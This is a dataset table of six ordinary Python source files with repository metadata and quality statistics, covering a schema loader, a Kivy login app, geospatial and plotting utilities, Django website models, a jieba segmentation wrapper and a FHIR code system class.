hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
745ec4a1a4107300db6c0b26707d8947baa091a5 | 496 | py | Python | reproschema/models/utils.py | sanuann/reproschema-py | ece78068b185018ec3d7f56ef9498e6e366d1e70 | [
"Apache-2.0"
] | 3 | 2020-06-22T06:58:46.000Z | 2021-04-19T03:59:47.000Z | reproschema/models/utils.py | sanuann/reproschema-py | ece78068b185018ec3d7f56ef9498e6e366d1e70 | [
"Apache-2.0"
] | 10 | 2020-07-02T08:56:21.000Z | 2021-08-03T15:38:25.000Z | reproschema/models/utils.py | Remi-Gau/reproschema-py | 9597b24d0a63210508911d152f1e94175138c32e | [
"Apache-2.0"
] | 3 | 2020-06-21T19:28:40.000Z | 2020-07-03T06:53:08.000Z | import json
from . import Protocol, Activity, Item
def load_schema(filepath):
with open(filepath) as fp:
data = json.load(fp)
if "@type" not in data:
raise ValueError("Missing @type key")
schema_type = data["@type"]
if schema_type == "reproschema:Protocol":
return Protocol.from_data(data)
if schema_type == "reproschema:Activity":
return Activity.from_data(data)
    if schema_type == "reproschema:Item":
        return Item.from_data(data)
    raise ValueError(f"Unsupported @type: {schema_type}")
| 29.176471 | 45 | 0.66129 | 64 | 496 | 5 | 0.390625 | 0.125 | 0.1125 | 0.215625 | 0.21875 | 0.21875 | 0.21875 | 0 | 0 | 0 | 0 | 0 | 0.227823 | 496 | 16 | 46 | 31 | 0.835509 | 0 | 0 | 0 | 0 | 0 | 0.167339 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
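The `load_schema` helper in the row above dispatches on the JSON-LD `@type` key with chained `if` statements. A minimal standalone sketch of the same dispatch pattern, using a lookup table and stand-in classes (the real code uses reproschema's `Protocol`/`Activity`/`Item` models):

```python
import json

# Stand-in model classes; hypothetical simplified versions of the
# reproschema models, kept here only to make the sketch runnable.
class Protocol:
    @classmethod
    def from_data(cls, data):
        obj = cls()
        obj.data = data
        return obj

class Activity(Protocol):
    pass

class Item(Protocol):
    pass

# Table-driven dispatch on the JSON-LD @type instead of chained ifs.
LOADERS = {
    "reproschema:Protocol": Protocol,
    "reproschema:Activity": Activity,
    "reproschema:Item": Item,
}

def load_schema_data(data):
    if "@type" not in data:
        raise ValueError("Missing @type key")
    try:
        return LOADERS[data["@type"]].from_data(data)
    except KeyError:
        raise ValueError("Unsupported @type: " + data["@type"])

obj = load_schema_data(json.loads('{"@type": "reproschema:Activity"}'))
print(type(obj).__name__)  # -> Activity
```

The table makes adding a new schema type a one-line change instead of another `if` branch.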
746d29172dee4f61bf3ed0d46737bb7c9c82633b | 5,358 | py | Python | main.py | abhinav8797/Mobile_App | b0ba324c5cde7ef29ac515d9fad8a5b52eeb2ffb | [
"MIT"
] | null | null | null | main.py | abhinav8797/Mobile_App | b0ba324c5cde7ef29ac515d9fad8a5b52eeb2ffb | [
"MIT"
] | null | null | null | main.py | abhinav8797/Mobile_App | b0ba324c5cde7ef29ac515d9fad8a5b52eeb2ffb | [
"MIT"
] | null | null | null | from kivy.app import App
from kivy.lang import Builder
from kivy.uix.screenmanager import ScreenManager, Screen
import json, glob
from datetime import datetime
from pathlib import Path
import random
from hoverable import HoverBehavior
from kivy.uix.image import Image
from kivy.uix.behaviors import ButtonBehavior
Builder.load_file('design.kv')
class LoginScreen(Screen):
def login(self,uname,pword):
if uname == '' or pword == '':
self.ids.login_wrong.text="username and password are required"
else:
with open("users.json") as file:
user = json.load(file)
if uname in user and user[uname]['password']==pword:
self.manager.current="success_login_screen"
self.ids.username.text=""
self.ids.password.text=""
self.ids.login_wrong.text=""
else:
self.ids.login_wrong.text="Wrong username or password!"
self.ids.username.text=""
self.ids.password.text=""
def forgot_pass(self):
self.manager.current="forgot_pass_screen"
self.ids.login_wrong.text=""
def signup(self):
self.manager.current="sign_up_screen"
self.ids.login_wrong.text=""
class SignUpScreen(Screen):
def add_user(self,uname,pword):
if uname == '' or pword == '':
self.ids.detailsrequired.text="username and password are required"
else:
with open("users.json") as file:
users = json.load(file)
if uname in users:
                self.ids.detailsrequired.text="username already exists"
self.ids.username.text=""
self.ids.password.text=""
else:
users[uname]={'username':uname,'password':pword,'created':datetime.now().strftime("%Y-%m-%d %H-%M-%S")}
with open("users.json",'w') as file:
json.dump(users,file)
self.manager.current="signup_success_screen"
self.ids.username.text=""
self.ids.password.text=""
self.ids.detailsrequired.text=""
#def login(self,uname,pword,detail):
def login(self):
self.manager.current="login_screen"
self.ids.username.text=""
self.ids.password.text=""
self.ids.detailsrequired.text=""
class SignUpSuccessScreen(Screen):
def go_to_login(self):
self.manager.transition.direction="right"
self.manager.current="login_screen"
class ForgotPasswordScreen(Screen):
def passchange(self,uname,npword,cpword):
if uname == '' or npword == '' or cpword == '':
self.ids.username_wrong.text="username and password are required"
#print(uname,npword,cpword)
else:
with open("users.json") as file:
user = json.load(file)
if uname in user and npword==cpword:
                user[uname]['password'] = npword  # update only the password, keep username/created
with open("users.json",'w') as file:
json.dump(user,file)
self.manager.current="pass_change_screen"
self.ids.uname.text = ""
self.ids.newpass.text = ""
#print("erase")
self.ids.cpass.text = ""
#print("hello world")
self.ids.username_wrong.text=""
else:
                self.ids.username_wrong.text="Wrong username or the passwords don't match"
self.ids.uname.text = ""
self.ids.newpass.text = ""
#print("hello worldll")
self.ids.cpass.text = ""
def login(self):
self.manager.current="login_screen"
self.ids.username_wrong.text=""
self.ids.uname.text=""
self.ids.newpass.text=""
self.ids.cpass.text=""
class SuccessLoginScreen(Screen):
def logout(self,feel):
self.manager.transition.direction="right"
#print(feel)
self.manager.current="login_screen"
self.ids.feeling.text = ""
self.ids.quote.text=""
def get_quote(self, feel):
feel = feel.lower()
available_feelings = glob.glob("quotes/*txt")
available_feelings = [Path(filename).stem for filename in available_feelings]
#print(available_feelings)
#print(feel)
if feel == '':
self.ids.quote.text="Enter your feeling "
elif feel in available_feelings:
with open(f"quotes/{feel}.txt",encoding="utf8") as file:
quotes = file.readlines()
#print(quotes)
self.ids.quote.text = random.choice(quotes)
else:
self.ids.quote.text ="Try another Feeling"
self.ids.feeling.text=""
class ImageButton(ButtonBehavior,HoverBehavior,Image):
pass
class PasswordChangeScreen(Screen):
def login(self):
self.manager.current="login_screen"
class RootWidget(ScreenManager):
pass
class MainApp(App):
def build(self):
return RootWidget()
if __name__ == "__main__":
MainApp().run()
| 33.911392 | 120 | 0.557484 | 582 | 5,358 | 5.058419 | 0.216495 | 0.090353 | 0.05231 | 0.028872 | 0.466033 | 0.380774 | 0.320313 | 0.293139 | 0.241848 | 0.169837 | 0 | 0.000277 | 0.326055 | 5,358 | 157 | 121 | 34.127389 | 0.81501 | 0.034528 | 0 | 0.470588 | 0 | 0 | 0.109469 | 0.004195 | 0 | 0 | 0 | 0 | 0 | 1 | 0.10084 | false | 0.226891 | 0.084034 | 0.008403 | 0.268908 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
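Every screen in the row above repeats the same `users.json` read-modify-write pattern. A Kivy-free sketch of that storage logic (file name and record fields mirror the app, but this is an illustration, not the app's actual module):

```python
import json
from datetime import datetime

def add_user(path, uname, pword):
    """Register a user; return False if the name is already taken."""
    with open(path) as fp:
        users = json.load(fp)
    if uname in users:
        return False
    users[uname] = {
        "username": uname,
        # A real app should store a salted hash, not the plaintext password.
        "password": pword,
        "created": datetime.now().strftime("%Y-%m-%d %H-%M-%S"),
    }
    with open(path, "w") as fp:
        json.dump(users, fp)
    return True

def check_login(path, uname, pword):
    """True only when the user exists and the password matches."""
    with open(path) as fp:
        users = json.load(fp)
    return uname in users and users[uname]["password"] == pword
```

Separating the storage logic from the `Screen` classes this way also makes it testable without a running Kivy app.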
7474b68b83f436dbeac054b6ef77bbb2f04f040e | 4,001 | py | Python | detecting_poverty/utils.py | ryanmwebb/detecting_poverty | 74974e6a35891e7a063bf6b611b23d4ba75ad013 | [
"MIT"
] | 1 | 2021-05-29T13:59:02.000Z | 2021-05-29T13:59:02.000Z | detecting_poverty/utils.py | ryanmwebb/detecting_poverty | 74974e6a35891e7a063bf6b611b23d4ba75ad013 | [
"MIT"
] | null | null | null | detecting_poverty/utils.py | ryanmwebb/detecting_poverty | 74974e6a35891e7a063bf6b611b23d4ba75ad013 | [
"MIT"
] | 2 | 2021-03-21T18:38:47.000Z | 2021-09-04T20:28:01.000Z | import torch
import numpy as np
from PIL import Image
import random
import math
import seaborn as sns
from sklearn import metrics
import matplotlib.pyplot as plt
def adjusted_classes(y_scores, threshold):
"""
This function adjusts class predictions based on the prediction threshold (t).
Will only work for binary classification problems.
Inputs:
y_scores (1D array): Values between 0 and 1.
threshold (float): probability threshold
Returns:
array of 0s and 1s
"""
return (y_scores >= threshold).astype(int)
def confusion_matrix(Ytrue, Ypred):
"""
Display a color weighted confusion matrix for binary classification.
"""
sns.heatmap(metrics.confusion_matrix(Ytrue, Ypred), annot=True)
plt.ylabel("True Label")
plt.xlabel("Predicted Label")
plt.show()
def roc_auc(model, Xtest, Ytest):
"""
Display the ROC curve.
"""
metrics.plot_roc_curve(model, Xtest, Ytest)
plt.show()
def precision_recall(model, Xtest, Ytest):
"""
Display the Precision-Recall curve.
"""
metrics.plot_precision_recall_curve(model, Xtest, Ytest)
plt.show()
class LatLonBBDraw():
'''
A callable class to provide random samples of fixed size bounding
boxes from within a larger (super) bounding box.
'''
def __init__(self, lat_range, lon_range, dimension):
"""
Create parameters for sampling function.
Inputs:
lat_range (tuple of two floats): north and south boundaries
of super bounding box.
lon_range (tuple of two floats): west and east boundaries.
dimension (float): width (and height) in degrees of desired bounding
box sub samples.
"""
self.lat_range = lat_range
self.lon_range = lon_range
self.dimension = dimension
def __call__(self):
"""
Returns:
A length 4 tuple of floats: (west, south, east, north)
"""
lat = random.uniform(self.lat_range[0], self.lat_range[1])
lon = random.uniform(self.lon_range[0], self.lon_range[1])
return (lon, lat, lon+self.dimension, lat+self.dimension)
class LatLonDraw():
'''
A callable class to provide random samples of lat/lon pairs
from within a bounding box.
'''
def __init__(self, lat_range, lon_range):
"""
Create parameters for sampling function.
Inputs:
lat_range (tuple of two floats): north and south boundaries
of super bounding box.
lon_range (tuple of two floats): west and east boundaries.
"""
self.lat_range = lat_range
self.lon_range = lon_range
def __call__(self):
"""
Returns:
A length 2 tuple of floats: (lat, lon)
"""
lat = random.uniform(self.lat_range[0], self.lat_range[1])
lon = random.uniform(self.lon_range[0], self.lon_range[1])
return (lon, lat)
def resize(digits, row_size, column_size):
    """
    Resize images from their input size to row_size x column_size.
    @row_size, column_size: the intended output dimensions
    """
return np.array(
[
np.array(Image.fromarray(_).resize((row_size, column_size)))
for _ in digits
]
)
def gen_solution(test_lst, fname):
"""
Generate csv file for Kaggle submission
------
:in:
test_lst: 1d array of (n_data), predicted test labels
fname: string, name of output file
"""
heads = ['Id', 'Category']
with open(fname, 'w') as fo:
fo.write(heads[0] + ',' + heads[1] + '\n')
for ind in range(len(test_lst)):
fo.write(heads[0] + ' ' + str(ind + 1) + ',' + str(test_lst[ind]) + '\n')
def create_space(lat, lon, s=10):
"""Creates a s km x s km square centered on (lat, lon)"""
v = (180/math.pi)*(500/6378137)*s # roughly 0.045 for s=10
return lat - v, lon - v, lat + v, lon + v
| 29.858209 | 85 | 0.613347 | 529 | 4,001 | 4.506616 | 0.336484 | 0.040268 | 0.040268 | 0.025168 | 0.369128 | 0.348154 | 0.30453 | 0.30453 | 0.272651 | 0.240772 | 0 | 0.014246 | 0.28068 | 4,001 | 134 | 86 | 29.858209 | 0.814107 | 0.388403 | 0 | 0.240741 | 0 | 0 | 0.020653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.203704 | false | 0 | 0.148148 | 0 | 0.481481 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
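The `create_space` helper above converts a distance in kilometres to a degree offset via the Earth-radius constant 6378137. A quick sanity-check sketch of that conversion (same formula, re-derived here as an illustration; `degrees_per_step` is a name introduced for this sketch):

```python
import math

EARTH_RADIUS_M = 6378137  # WGS84 equatorial radius, as in the original

def degrees_per_step(s, step_m=500):
    # Arc length step_m * s metres on a great circle, expressed in degrees.
    return (180 / math.pi) * (step_m / EARTH_RADIUS_M) * s

def create_space(lat, lon, s=10):
    """s km x s km square centered on (lat, lon), as in the original."""
    v = degrees_per_step(s)
    return lat - v, lon - v, lat + v, lon + v

v = degrees_per_step(10)
print(round(v, 4))  # -> 0.0449, matching the "roughly 0.045 for s=10" comment
```

This confirms the inline comment in the source: at s=10 the half-width is about 0.045 degrees.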
74812779d8c48fa896cdffccf52a934b0eca18b3 | 3,433 | py | Python | api/models.py | jjkivai/SolutionsWeb | c80d63784b90776d7506c98d5c96ad100ee08d67 | [
"MIT"
] | null | null | null | api/models.py | jjkivai/SolutionsWeb | c80d63784b90776d7506c98d5c96ad100ee08d67 | [
"MIT"
] | null | null | null | api/models.py | jjkivai/SolutionsWeb | c80d63784b90776d7506c98d5c96ad100ee08d67 | [
"MIT"
] | null | null | null | from django.db import models
# Helper functions
def project_cover(instance, filename):
return "Project_{0}/cover_{1}".format(instance.id, filename)
def project_image(instance, filename):
return "Project_{0}/image_{1}".format(instance.project.id, filename)
def client_logo(instance, filename):
return "ClientLogos/{0}".format(filename)
def license_images(instance, filename):
return "Licences/{0}".format(filename)
# Create your models here.
class Project(models.Model):
title = models.CharField(
"Title",
help_text="Title of the project",
max_length=64,
null=False,
blank=False,
)
cover_image = models.ImageField(
"Cover Image",
upload_to=project_cover,
blank=False,
null=False,
help_text="Project cover image",
)
short_description = models.CharField(
"Short Description",
help_text="Example: Renovations and upgrades",
max_length=32,
blank=True,
null=False,
default="",
)
description = models.TextField(
"Project Description",
help_text="Overview of the project, written in markdown",
blank=False,
null=False,
)
details = models.TextField(
"Project Details",
help_text="Details about the project, including specifics",
null=False,
blank=False,
)
def __str__(self) -> str:
return self.title
def __repr__(self) -> str:
return self.title
class ProjectImage(models.Model):
project = models.ForeignKey(
to=Project,
on_delete=models.CASCADE,
blank=False,
null=False,
related_name="images",
)
text = models.CharField(
"Project Image Text",
help_text="A title for the image",
default="Project Image",
max_length=32,
)
image = models.ImageField("Project Image", upload_to=project_image)
class Client(models.Model):
client_image = models.ImageField("Client Logo", upload_to=client_logo)
company = models.CharField(
"Company Name",
max_length=64,
null=False,
blank=False,
default="",
help_text="Name of company",
)
def __str__(self) -> str:
return str(self.company)
def __repr__(self) -> str:
return self.company
class License(models.Model):
license_image = models.ImageField("License Photo", upload_to=license_images)
name = models.CharField(
"License Title",
max_length=64,
null=False,
blank=False,
default="Solutions License",
help_text="Title of license to be displayed",
)
def __str__(self) -> str:
return self.name
def __repr__(self) -> str:
return self.name
class Message(models.Model):
first_name = models.CharField("First Name", null=False, blank=False, max_length=32)
last_name = models.CharField("Last Name", null=False, blank=False, max_length=32)
company = models.CharField("Company", null=False, blank=False, max_length=32)
email = models.EmailField("Email", blank=False, null=False)
message = models.TextField("Message", max_length=200)
def __str__(self) -> str:
        return "Message from {0} {1}".format(self.last_name, self.first_name)
def __repr__(self) -> str:
        return "Message from {0} {1}".format(self.last_name, self.first_name) | 26.820313 | 87 | 0.633557 | 403 | 3,433 | 5.205955 | 0.210918 | 0.051478 | 0.049571 | 0.063394 | 0.259295 | 0.212107 | 0.15062 | 0.122021 | 0.054337 | 0.054337 | 0 | 0.011284 | 0.251384 | 3,433 | 128 | 88 | 26.820313 | 0.805058 | 0.011943 | 0 | 0.356436 | 0 | 0 | 0.164602 | 0.012389 | 0 | 0 | 0 | 0 | 0 | 1 | 0.118812 | false | 0 | 0.009901 | 0.118812 | 0.465347 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
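The model file above wires each `ImageField`'s `upload_to` to a small path-building callable such as `project_cover`. Django calls these with `(instance, filename)` and they only build storage paths, so the pattern is testable without Django itself; a plain object stands in for a model instance here:

```python
# Hypothetical stand-in for a Django model instance with a primary key.
class FakeProject:
    def __init__(self, pk):
        self.id = pk

def project_cover(instance, filename):
    # Same path scheme as the models in the row above.
    return "Project_{0}/cover_{1}".format(instance.id, filename)

def client_logo(instance, filename):
    return "ClientLogos/{0}".format(filename)

print(project_cover(FakeProject(7), "a.png"))  # -> Project_7/cover_a.png
```

Keeping `upload_to` callables free of ORM access, as above, means they stay trivially unit-testable.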
748a825397bd0e9314a447970d621e66d1ce7f06 | 2,386 | py | Python | html_extract/jieba_call.py | xinyi-Z/HtmlExtract-Python | d4cc12231739f3ac521d12a8e83fdf12b829fa70 | [
"MIT"
] | 6 | 2017-03-08T09:30:39.000Z | 2019-10-23T09:47:53.000Z | html_extract/jieba_call.py | xinyi-spark/HtmlExtract-Python | d4cc12231739f3ac521d12a8e83fdf12b829fa70 | [
"MIT"
] | null | null | null | html_extract/jieba_call.py | xinyi-spark/HtmlExtract-Python | d4cc12231739f3ac521d12a8e83fdf12b829fa70 | [
"MIT"
] | 1 | 2020-04-26T09:44:30.000Z | 2020-04-26T09:44:30.000Z | # -*- coding: utf-8 -*-
'''
Name: jieba library wrapper
Author: XinYi 609610350@qq.com
Time: 2016.3
'''
import jieba.analyse
import jieba.posseg
import jieba
def cut_all(data):
    '''
    Full mode: scan out every word in the sentence that can form a term.
    来到北京大学 --> 来到/北京/北京大学/大学
    '''
temp_result = jieba.cut(data, cut_all=True)
temp_result = '/'.join(temp_result)
return temp_result
def cut_accurate(data):
    '''
    Accurate mode: try to cut the sentence precisely.
    来到北京大学 --> 来到/北京大学
    '''
temp_result = jieba.cut(data, cut_all=False)
# temp_result = '/'.join(temp_result)
return temp_result
def cut_search(data):
    '''
    Search-engine mode: on top of accurate mode, long words are cut again.
    来到北京大学 --> 来到/北京/大学/北京大学
    '''
temp_result = jieba.cut_for_search(data)
temp_result = '/'.join(temp_result)
return temp_result
def add_word_dict(word, freq=None, tag=None):
    '''
    Add a new word to the dictionary.
    '''
    jieba.add_word(word, freq=freq, tag=tag)
def del_word_dict(word):
    '''
    Delete a word from the dictionary.
    '''
jieba.del_word(word)
def jieba_textrank(data, topK=20, withWeight=False, allowPOS=('nz', 'nt', 'ns', 'nr', 'n', 'vn')):
    '''
    Use TextRank to extract keywords from the text. topK sets how many
    keywords to return (default 20), withWeight whether to return them in
    descending weight order, and allowPOS which parts of speech to keep.
    '''
keyword_list = []
    for w in jieba.analyse.textrank(data, topK=topK, withWeight=True, allowPOS=allowPOS):
keyword_list.append(w[0])
keyword = '/'.join(keyword_list)
return keyword
def jieba_POS_tagging(data, allowPOS=('nz', 'nt', 'ns', 'nr', 'n', 'vn')):
    '''
    Segment data with POS tagging, keep only words whose tag is allowed
    by allowPOS, and return the joined result.
    '''
segs = jieba.posseg.cut(data)
temp_result = []
for w in segs:
if w.flag[0] in allowPOS:
temp_result.append(w.word)
temp_result = '/'.join(temp_result)
return temp_result
def jieba_tfidf(data, topK=20, withWeight=False, allowPOS=('nz', 'nt', 'ns', 'nr', 'n', 'vn')):
    '''
    Use TF-IDF to extract keywords from the text. topK sets how many
    keywords to return (default 20), withWeight whether to return them in
    descending weight order, and allowPOS which parts of speech to keep.
    '''
temp_result = jieba.analyse.extract_tags(
data, topK, withWeight, allowPOS)
temp_result = '/'.join(temp_result)
return temp_result
if __name__ == '__main__':
    # print(cut_all('来到北京大学'))
    # print(cut_search('来到北京大学'))
    # print(cut_accurate('来到北京大学'))
    # print(jieba_textrank('来到北京大学', topK=2, withWeight=True))
    print(jieba_POS_tagging('淘宝网 - 淘!我喜欢')) | 24.346939 | 99 | 0.615675 | 283 | 2,386 | 4.992933 | 0.321555 | 0.14862 | 0.04954 | 0.063694 | 0.34041 | 0.269639 | 0.269639 | 0.216561 | 0.188252 | 0.127389 | 0 | 0.015453 | 0.24057 | 2,386 | 98 | 100 | 24.346939 | 0.764349 | 0.079631 | 0 | 0.236842 | 0 | 0 | 0.037549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.052632 | null | null | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
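`jieba_POS_tagging` above keeps only tokens whose part-of-speech tag begins with an allowed letter. The filtering step itself needs no jieba; a pure-Python sketch with hypothetical `(word, tag)` pairs standing in for `jieba.posseg` output:

```python
def filter_by_pos(tagged_tokens, allow_pos=('n', 'v')):
    """Keep tokens whose POS tag starts with an allowed prefix, joined by '/'."""
    kept = [word for word, tag in tagged_tokens if tag[:1] in allow_pos]
    return '/'.join(kept)

# Hypothetical tagger output: (word, POS-tag) pairs, not real jieba results.
sample = [("淘宝网", "nz"), ("喜欢", "v"), ("我", "r")]
print(filter_by_pos(sample))  # -> 淘宝网/喜欢
```

Matching on the tag's first character, as the original does with `w.flag[0]`, treats all noun subtypes (`n`, `nz`, `nt`, ...) alike.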
748ade9671cc9b1a53d8a53adc42d40e0c798ebd | 2,930 | py | Python | oops_fhir/r4/code_system/v3_hl7_context_conduction_style.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | [
"MIT"
] | null | null | null | oops_fhir/r4/code_system/v3_hl7_context_conduction_style.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | [
"MIT"
] | null | null | null | oops_fhir/r4/code_system/v3_hl7_context_conduction_style.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | [
"MIT"
] | null | null | null | from pathlib import Path
from fhir.resources.codesystem import CodeSystem
from oops_fhir.utils import CodeSystemConcept
__all__ = ["v3HL7ContextConductionStyle"]
_resource = CodeSystem.parse_file(Path(__file__).with_suffix(".json"))
class v3HL7ContextConductionStyle:
"""
v3 Code System HL7ContextConductionStyle
The styles of context conduction usable by relationships within a static
    model derived from the HL7 Reference Information Model.
Status: active - Version: 2018-08-12
Copyright None
http://terminology.hl7.org/CodeSystem/v3-HL7ContextConductionStyle
"""
c = CodeSystemConcept(
{
"code": "C",
"definition": "Definition: Context conduction is defined using the contextConductionCode and contextConductionInd attributes on ActRelationship and Participation.\r\n\n \n UsageNotes: This approach is deprecated as of March, 2010.",
"display": "conduction-indicator-based",
}
)
"""
conduction-indicator-based
Definition: Context conduction is defined using the contextConductionCode and contextConductionInd attributes on ActRelationship and Participation.
UsageNotes: This approach is deprecated as of March, 2010.
"""
i = CodeSystemConcept(
{
"code": "I",
"definition": 'Definition: Context conduction is not explicitly defined. The recipient of an instance must infer conduction based on the semantics of the model and what is deemed "reasonable".\r\n\n \n UsageNotes: Because this approach can lead to variation in instance interpretation, its use is discouraged.',
"display": "inferred",
}
)
"""
inferred
Definition: Context conduction is not explicitly defined. The recipient of an instance must infer conduction based on the semantics of the model and what is deemed "reasonable".
UsageNotes: Because this approach can lead to variation in instance interpretation, its use is discouraged.
"""
v = CodeSystemConcept(
{
"code": "V",
"definition": 'Definition: Context conduction is defined using the ActRelationship.blockedContextActRelationshipType and blockedContextParticipationType attributes and the "conductible" property on the ActRelationshipType and ParticipationType code systems.',
"display": "vocabulary-based",
}
)
"""
vocabulary-based
Definition: Context conduction is defined using the ActRelationship.blockedContextActRelationshipType and blockedContextParticipationType attributes and the "conductible" property on the ActRelationshipType and ParticipationType code systems.
"""
class Meta:
resource = _resource
